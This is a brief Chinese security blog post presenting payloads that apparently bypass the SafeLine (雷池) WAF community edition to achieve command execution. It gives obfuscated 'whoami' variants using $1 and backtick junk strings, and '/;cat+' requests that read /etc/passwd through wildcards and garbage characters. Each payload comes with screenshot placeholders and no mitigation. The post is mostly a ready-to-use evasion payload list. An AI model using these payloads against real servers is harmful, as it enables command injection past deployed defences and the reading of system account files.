雷池waf社区版命令执行绕过

1.命令执行whoami回显

图片[1]-雷池waf社区版命令执行绕过-渗透云记 - 专注于网络安全与技术分享

2.构造不影响解析的poc

whoami

方法1 $1:

wh$1oami
图片[2]-雷池waf社区版命令执行绕过-渗透云记 - 专注于网络安全与技术分享

方法2 /;+`符号:

/;w`saldkj2190`ho`12wsa2`am`foj11`i
图片[3]-雷池waf社区版命令执行绕过-渗透云记 - 专注于网络安全与技术分享

cat /etc/passwd

方法一 通配符、垃圾字符1:

 /;cat+/et?/passwd
图片[4]-雷池waf社区版命令执行绕过-渗透云记 - 专注于网络安全与技术分享
图片[5]-雷池waf社区版命令执行绕过-渗透云记 - 专注于网络安全与技术分享

方法三 通配符、垃圾字符3:

/;cat+12321231313213+/e*c/passwd
图片[6]-雷池waf社区版命令执行绕过-渗透云记 - 专注于网络安全与技术分享
© 版权声明
THE END
喜欢就支持一下吧
点赞1771 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容